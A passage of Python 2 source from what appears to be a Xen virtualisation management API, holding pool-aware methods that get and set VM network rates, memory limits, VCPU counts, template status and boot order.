@summary: Get VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param vif_ref: VIF uuid
@return: VIF's rate(kbps).
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_rate(session, vm_ref, param_type, vif_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_rate', vm_ref, param_type, vif_ref)
else:
return self._VM_get_rate(session, vm_ref, param_type, vif_ref)
def _VM_get_rate(self, session, vm_ref, param_type, vif_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param vif_ref: VIF uuid
@return: VIF's rate(kbps).
@rtype: dict.
'''
rate = '-1'
eth_num = '-1'
try:
other_config = self._VM_get_other_config(session, vm_ref).get('Value')
device = self.VIF_get_device(session, vif_ref).get('Value')
#log.debug('>>>>>>>>>>>>device')
#log.debug(device)
eth_num = ''
if device != '' and device.startswith('eth'):
eth_num = device[3:]
elif not device :
vif_refs = self._VM_get_VIFs(session, vm_ref).get('Value')
log.debug('vif_refs %s' % vif_refs)
try:
eth_num = str(vif_refs.index(vif_ref))
except:
eth_num = ''
pass
log.debug('eth_num %s' % eth_num)
if other_config and eth_num != '':
rate_list = other_config.get(param_type,{})
log.debug('rate_list %s' % rate_list)
rate = rate_list.get(eth_num,'-1')
return xen_api_success(rate)
except Exception, exn:
log.exception(exn)
return xen_api_success(rate)
def VM_get_domid(self, _, ref):
'''
@author: wuyuewen
@summary: Get VM's id.
@precondition: VM is running.
@param _: session of RPC.
@param ref: uuid
@return: VM's id.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_domid(_, ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_domid', ref)
else:
return self._VM_get_domid(_, ref)
def _VM_get_domid(self, _, ref):
'''
@author: wuyuewen
@summary: Internal method. Get VM's id.
@precondition: VM is running.
@param _: session of RPC.
@param ref: uuid
@return: VM's id.
@rtype: dict.
'''
domid = XendDomain.instance().get_vm_by_uuid(ref).getDomid()
return xen_api_success(domid is None and -1 or domid)
def VM_get_cpu_pool(self, session, vm_ref):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
pool_ref = XendCPUPool.query_pool_ref(dom.get_cpu_pool())
return xen_api_success(pool_ref)
def VM_set_pool_name(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('pool_name', session, vm_ref, value)
def VM_get_is_control_domain(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Check the VM is dom0 or not.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_is_control_domain(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_is_control_domain", vm_ref)
else:
return self._VM_get_is_control_domain(session, vm_ref)
def _VM_get_is_control_domain(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check the VM is dom0 or not.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
xd = XendDomain.instance()
return xen_api_success(xd.get_vm_by_uuid(vm_ref) == xd.privilegedDomain())
def VM_get_VIF_record(self, session, vm_ref, vif_ref):
'''
@author: wuyuewen
@summary: Get VIF record, this method is a instead of VIF_get_record() use in Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vif_ref: VIF uuid
@return: VIF record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VIF_get_record(session, vif_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VIF_get_record", vif_ref)
else:
return self.VIF_get_record(session, vif_ref)
def VM_get_network_record(self, session, vm_ref, vif):
'''
@author: wuyuewen
@summary: Get network record, this method is a instead of network_get_record() use in Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vif: VIF uuid
@return: network record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
xenapi = self._get_XendAPI_instance()
bridge = self._VIF_get(vif, "bridge").get('Value')
list_network = xenapi.network_get_by_name_label(session, bridge).get('Value')
if not list_network:
return xen_api_error(['NETWORK_NOT_EXISTS'])
net_ref = list_network[0]
net = XendAPIStore.get(net_ref, "network")
return xen_api_success(net.get_record())
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_network_record", vm_ref, vif)
else:
xenapi = self._get_XendAPI_instance()
bridge = self._VIF_get(vif, "bridge").get('Value')
list_network = xenapi.network_get_by_name_label(session, bridge).get('Value')
if not list_network:
return xen_api_error(['NETWORK_NOT_EXISTS'])
net_ref = list_network[0]
net = XendAPIStore.get(net_ref, "network")
return xen_api_success(net.get_record())
def VM_get_VBD_record(self, session, vm_ref, vbd_ref):
'''
@author: wuyuewen
@summary: Get VBD record, this method is a instead of VBD_get_record() use in Pool.
@param session: session of RPC.
@param vm_ref: uuid
@param vbd_ref: VBD uuid
@return: VBD record struct.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VBD_get_record(session, vbd_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VBD_get_record", vbd_ref)
else:
return self.VBD_get_record(session, vbd_ref)
def VM_get_system_VDI(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get VDI that VM's system VBD linked, VM->VBD(VM's disk)->VDI(Storage management).
@precondition: VM has system VBD device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VDI.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_system_VDI(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "VM_get_system_VDI", vm_ref)
else:
return self._VM_get_system_VDI(session, vm_ref)
def _VM_get_system_VDI(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get VDI that VM's system VBD linked, VM->VBD(VM's disk)->VDI(Storage management).
@precondition: VM has system VBD device.
@param session: session of RPC.
@param vm_ref: uuid
@return: VDI.
@rtype: dict.
'''
vbds = self._VM_get_VBDs(session, vm_ref).get('Value', [])
sys_vbd = ''
sys_vdi = ''
if vbds:
for vbd in vbds:
bootable = self.VBD_get_bootable(session, vbd).get('Value', False)
vbd_type = self.VBD_get_type(session, vbd).get('Value', '')
if bootable and cmp(vbd_type, 'Disk') == 0:
sys_vbd = vbd
break
if sys_vbd:
sys_vdi = self.VBD_get_VDI(session, sys_vbd).get('Value', '')
return xen_api_success(sys_vdi)
def VM_set_name_label(self, session, vm_ref, label):
'''
@author: wuyuewen
@summary: Set VM's name label.
@precondition: Only support english, param <label> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param label: name label to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
try:
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
self._VM_set_name_label(session, vm_ref, label)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
xen_rpc_call(remote_ip, 'VM_set_name_label', vm_ref, label)
return xen_api_success_void()
else:
return self._VM_set_name_label(session, vm_ref, label)
except VmError, e:
return xen_api_error(['VM error: ', e])
def _VM_set_name_label(self, session, vm_ref, label):
'''
@author: wuyuewen
@summary: Internal method. Set VM's name label.
@precondition: Only support english, param <label> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param label: name label to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.setName(label)
self._VM_save(dom)
return xen_api_success_void()
def VM_set_name_description(self, session, vm_ref, desc):
'''
@author: wuyuewen
@summary: Set VM's name description.
@precondition: Only support english, param <desc> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param desc: name description to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_name_description(session, vm_ref, desc)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_name_description', vm_ref, desc)
else:
return self._VM_set_name_description(session, vm_ref, desc)
def _VM_set_name_description(self, session, vm_ref, desc):
'''
@author: wuyuewen
@summary: Internal method. Set VM's name description.
@precondition: Only support english, param <desc> has no special character except "_" "-" ".".
@param session: session of RPC.
@param vm_ref: uuid
@param desc: name description to change.
@return: True | False
@rtype: dict.
@raise xen_api_error: VM error
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.setNameDescription(desc)
self._VM_save(dom)
return xen_api_success_void()
    def VM_set_user_version(self, session, vm_ref, ver):
        '''
        @deprecated: not used
        '''
        # NOTE(review): resolves the VM (which validates vm_ref) but never
        # applies <ver>; the method is an unimplemented stub returning "todo".
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        return xen_api_todo()
def VM_set_is_a_template(self, session, vm_ref, is_template):
'''
@author: wuyuewen
@summary: Change a VM to VM template, or change a VM template to VM.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param is_template: True | False
@return: True | False
@rtype: dict.
@raise xen_api_error: VM_BAD_POWER_STATE
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_is_a_template(session, vm_ref, is_template)
else:
return xen_rpc_call(host_ip, 'VM_set_is_a_template', vm_ref, is_template)
else:
return self._VM_set_is_a_template(session, vm_ref, is_template)
    def _VM_set_is_a_template(self, session, vm_ref, is_template):
        '''
        @author: wuyuewen
        @summary: Internal method. Change a VM to VM template, or change a VM template to VM.
        @precondition: VM not running.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param is_template: True | False
        @return: True | False
        @rtype: dict.
        @raise xen_api_error: VM_BAD_POWER_STATE
        '''
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        # Refuse the conversion while the domain is running.
        if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
            return xen_api_error(
                ['VM_BAD_POWER_STATE', vm_ref,
                 XendDomain.POWER_STATE_NAMES[XEN_API_VM_POWER_STATE_RUNNING],
                 XendDomain.POWER_STATE_NAMES[dom._stateGet()]])
        dom.set_is_a_template(is_template)
        # NOTE(review): sibling setters persist via self._VM_save(dom);
        # this one calls self.VM_save(dom) -- confirm which is intended.
        self.VM_save(dom)
        return xen_api_success_void()
# #Mapping intranet ip address to outer net ip address.
# def VM_set_ip_map(self, session, vm_ref, vif):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_set_ip_map(session, vm_ref, vif)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_set_ip_map', vm_ref, vif)
# else:
# return self._VM_set_ip_map(session, vm_ref, vif)
#
# def _VM_set_ip_map(self, session, vm_ref, vif):
# mac = None
# mac_rec = self.VIF_get_MAC(session, vif)
# if mac_rec.get('Status') == 'Success':
# mac = mac_rec.get('Value')
# if mac:
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# dom.set_ip_map(mac)
# return xen_api_success(self._VM_save(dom))
# else:
# log.error('Can not get MAC from vif.')
# return xen_api_error(['Get MAC from vif failed!VM:', vm_ref])
# def VM_del_ip_map(self, session, vm_ref, vif):
# if BNPoolAPI._isMaster:
# host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
# if cmp(host_ref, XendNode.instance().uuid) == 0:
# return self._VM_del_ip_map(session, vm_ref, vif)
# else:
# host_ip = BNPoolAPI.get_host_ip(host_ref)
# return xen_rpc_call(host_ip, 'VM_del_ip_map', vm_ref, vif)
# else:
# return self._VM_del_ip_map(session, vm_ref, vif)
#
# def _VM_del_ip_map(self, session, vm_ref, vif):
# mac = None
# mac_rec = self.VIF_get_MAC(session, vif)
# if mac_rec.get('Status') == 'Success':
# mac = mac_rec.get('Value')
# if mac:
# dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
# dom.set_ip_map(mac, True)
# return xen_api_success(self._VM_save(dom))
# else:
# log.error('Can not get MAC from vif.')
# return xen_api_error(['Get MAC from vif failed!VM:', vm_ref])
def VM_set_auto_power_on(self, session, vm_ref, val):
'''
@deprecated: not used
'''
return self.VM_set('auto_power_on', session, vm_ref, val)
def VM_set_memory_dynamic_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic max.
@precondition: VM not running, memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_max(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_max', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_max(session, vm_ref, mem)
def _VM_set_memory_dynamic_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic max.
@precondition: VM not running, memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_max(int(mem))
return self._VM_save(dom)
def VM_set_memory_dynamic_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_min(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_min', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_min(session, vm_ref, mem)
def _VM_set_memory_dynamic_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_min(int(mem))
return self._VM_save(dom)
def VM_set_memory_static_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory static max.
@precondition: VM not running, memory static max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_static_max(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_static_max', vm_ref, mem)
else:
return self._VM_set_memory_static_max(session, vm_ref, mem)
def _VM_set_memory_static_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory static max.
@precondition: VM not running, memory static max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_static_max(int(mem))
return self._VM_save(dom)
def VM_set_memory_static_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory static min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_static_min(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_static_min', vm_ref, mem)
else:
return self._VM_set_memory_static_min(session, vm_ref, mem)
def _VM_set_memory_static_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory static min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_static_min(int(mem))
return self._VM_save(dom)
def VM_set_memory_dynamic_max_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic max when VM is running.
@precondition: memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_max_live(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_max_live', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_max_live(session, vm_ref, mem)
def _VM_set_memory_dynamic_max_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic max when VM is running.
@precondition: memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
log.debug(int(mem))
dom.set_memory_dynamic_max(int(mem))
# need to pass target as MiB
dom.setMemoryTarget(int(mem)/1024/1024)
return xen_api_success_void()
def VM_set_memory_dynamic_min_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic min when VM is running.
@precondition: memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_min_live(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_min_live', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_min_live(session, vm_ref, mem)
def _VM_set_memory_dynamic_min_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic min when VM is running.
@precondition: memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_min(int(mem))
# need to pass target as MiB
dom.setMemoryTarget(int(mem) / 1024 / 1024)
return xen_api_success_void()
def VM_set_VCPUs_params(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('vcpus_params', session, vm_ref, value)
def VM_add_to_VCPUs_params(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
log.debug('in VM_add_to_VCPUs_params')
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'vcpus_params' not in dom.info:
dom.info['vcpus_params'] = {}
dom.info['vcpus_params'][key] = value
return self._VM_save(dom)
def VM_add_to_VCPUs_params_live(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
self.VM_add_to_VCPUs_params(session, vm_ref, key, value)
self._VM_VCPUs_params_refresh(vm_ref)
return xen_api_success_void()
    def _VM_VCPUs_params_refresh(self, vm_ref):
        '''
        @deprecated: not used
        '''
        xendom = XendDomain.instance()
        xeninfo = xendom.get_vm_by_uuid(vm_ref)
        #update the cpumaps
        # Keys look like "cpumap<N>"; a bare "cpumap" (len 6) is skipped.
        for key, value in xeninfo.info['vcpus_params'].items():
            if key.startswith("cpumap"):
                log.debug(key)
                if len(key) == 6:
                    continue
                vcpu = int(key[6:])
                try:
                    # NOTE(review): `cpus` is never used afterwards -- the
                    # map() call only serves as an eager validity check of
                    # the comma-separated list (any failure is logged below).
                    cpus = map(int, value.split(","))
                    xendom.domain_pincpu(xeninfo.getDomid(), vcpu, value)
                except Exception, ex:
                    log.exception(ex)
        #need to update sched params aswell
        # NOTE(review): requires BOTH 'weight' and 'cap' to be present but
        # only passes weight to the scheduler -- confirm 'cap' handling.
        if 'weight' in xeninfo.info['vcpus_params'] \
           and 'cap' in xeninfo.info['vcpus_params']:
            weight = xeninfo.info['vcpus_params']['weight']
            xendom.domain_sched_credit_set(xeninfo.getDomid(), weight)
def VM_set_VCPUs_number_live(self, _, vm_ref, num):
'''
@author: wuyuewen
@summary: Set VM's VCPUs number when VM is running.
@precondition: num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_number_live(_, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_number_live', vm_ref, num)
else:
return self._VM_set_VCPUs_number_live(_, vm_ref, num)
    def _VM_set_VCPUs_number_live(self, _, vm_ref, num):
        '''
        @author: wuyuewen
        @summary: Internal method. Set VM's VCPUs number when VM is running.
        @precondition: num > 0, num < max_cpu_limit(see /etc/xen/setting).
        @param _: session of RPC (unused).
        @param vm_ref: uuid
        @param num: num of VCPU
        @return: True | False.
        @rtype: dict.
        @raise XendError:
        '''
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        # setVCpuCount adjusts the online VCPU count of the live domain.
        dom.setVCpuCount(int(num))
        return xen_api_success_void()
def VM_remove_from_VCPUs_params(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'vcpus_params' in dom.info \
and key in dom.info['vcpus_params']:
del dom.info['vcpus_params'][key]
return self._VM_save(dom)
else:
return xen_api_success_void()
def VM_set_VCPUs_at_startup(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Set VM's VCPUs when vm startup.
@todo: do not work
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_at_startup(session, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_at_startup', vm_ref, num)
else:
return self._VM_set_VCPUs_at_startup(session, vm_ref, num)
    def _VM_set_VCPUs_at_startup(self, session, vm_ref, num):
        '''
        @author: wuyuewen
        @summary: Internal method. Set VM's VCPUs when vm startup.
        @todo: do not work
        @precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
        @param session: session of RPC.
        @param vm_ref: uuid
        @param num: num of VCPU
        @return: True | False.
        @rtype: dict.
        @raise XendError:
        '''
        # Plain config-field write; persistence handled by VM_set.
        return self.VM_set('VCPUs_at_startup', session, vm_ref, num)
def VM_set_VCPUs_max(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs number.
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_max(session, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_max', vm_ref, num)
else:
return self._VM_set_VCPUs_max(session, vm_ref, num)
    def _VM_set_VCPUs_max(self, session, vm_ref, num):
        '''
        @author: wuyuewen
        @summary: Internal method. Set VM's VCPUs number.
        @precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
        @param session: session of RPC.
        @param vm_ref: uuid
        @param num: num of VCPU
        @return: True | False.
        @rtype: dict.
        @raise XendError:
        '''
        dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
        # Applies the new VCPU count directly to the domain object rather
        # than going through the generic VM_set('VCPUs_max', ...) path.
        dominfo.setVCpuCount(int(num))
        return xen_api_success_void()
def VM_set_actions_after_shutdown(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_NORMAL_EXIT:
return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
return self.VM_set('actions_after_shutdown', session, vm_ref, action)
    def VM_set_actions_after_reboot(self, session, vm_ref, action):
        '''
        @deprecated: not used
        @summary: Validate and store the action taken when the VM reboots.
        '''
        if action not in XEN_API_ON_NORMAL_EXIT:
            return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
        return self.VM_set('actions_after_reboot', session, vm_ref, action)
    def VM_set_actions_after_suspend(self, session, vm_ref, action):
        '''
        @deprecated: not used
        @summary: Validate and store the action taken when the VM suspends.
        '''
        if action not in XEN_API_ON_NORMAL_EXIT:
            return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
        return self.VM_set('actions_after_suspend', session, vm_ref, action)
    def VM_set_actions_after_crash(self, session, vm_ref, action):
        '''
        @deprecated: not used
        @summary: Validate and store the action taken when the VM crashes.
        '''
        # Crash actions have their own (wider) allowed set.
        if action not in XEN_API_ON_CRASH_BEHAVIOUR:
            return xen_api_error(['VM_ON_CRASH_BEHAVIOUR_INVALID', vm_ref])
        return self.VM_set('actions_after_crash', session, vm_ref, action)
    # edit by wufan
    # value 'cd': boot from disk first
    # value 'dc': boot from cdrom first
    # may only be changed while the VM is not running
def VM_set_boot_order(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Set VM's boot priority, value=cd means boot from disk, value=dc means boot from cdrom.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param value: cd/dc
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_boot_order(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_boot_order', vm_ref, value)
else:
return self._VM_set_boot_order(session, vm_ref, value)
    def _VM_set_boot_order(self, session, vm_ref, value):
        '''
        @author: wuyuewen
        @summary: Internal method. Set VM's boot priority, value=cd means boot from disk, value=dc means boot from cdrom.
        @precondition: VM not running.
        @param session: session of RPC.
        @param vm_ref: uuid
        @param value: cd/dc
        @return: True | False.
        @rtype: dict.
        '''
        log.debug('set boot order: %s' % value)
        # The order has to be recorded in three places to take effect:
        # VM_add_to_HVM_boot_params
        dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
        if 'HVM_boot_params' not in dom.info:
            dom.info['HVM_boot_params'] = {}
        dom.info['HVM_boot_params']['order'] = value
        # VM_add_to_platform
        plat = dom.get_platform()
        plat['boot'] = value
        dom.info['platform'] = plat
        # VM_set_HVM_boot_policy ("BIOS order" enables the order string above)
